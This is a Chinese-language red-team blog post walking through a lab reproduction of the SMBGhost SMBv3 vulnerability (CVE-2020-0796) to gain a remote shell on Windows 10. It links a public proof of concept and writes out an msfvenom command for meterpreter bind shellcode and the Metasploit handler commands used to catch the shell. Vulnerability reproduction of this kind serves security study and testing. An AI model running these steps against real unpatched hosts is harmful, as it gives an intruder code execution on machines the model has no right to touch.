1. 首页
  2. 红队技术

漏洞复现–CVE-2020-0796 getshell

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

漏洞描述:

该漏洞是由SMBv3处理恶意制作的压缩数据包,未经认证攻击者可能利用此漏洞执行任意代码。

测试环境及工具:
windows10 1903 64位下载:

http://xz1.yes025.com/iso/cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso

CVE-2020-0796 “poc”下载:

https://github.com/chompie1337/SMBGhost_RCE_PoC

生成反向连接木马:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b ‘\x00’ -i 1 -f python

漏洞复现--CVE-2020-0796 getshell

msf监听:

漏洞复现--CVE-2020-0796 getshell

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.1.144
run

poc替换:

漏洞复现--CVE-2020-0796 getshell

修改内存为4G以上:

漏洞复现--CVE-2020-0796 getshell

成功getshell

漏洞复现--CVE-2020-0796 getshell

本文来自雷石安全实验室,经授权后发布,本文观点不代表立场,转载请联系原作者。

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息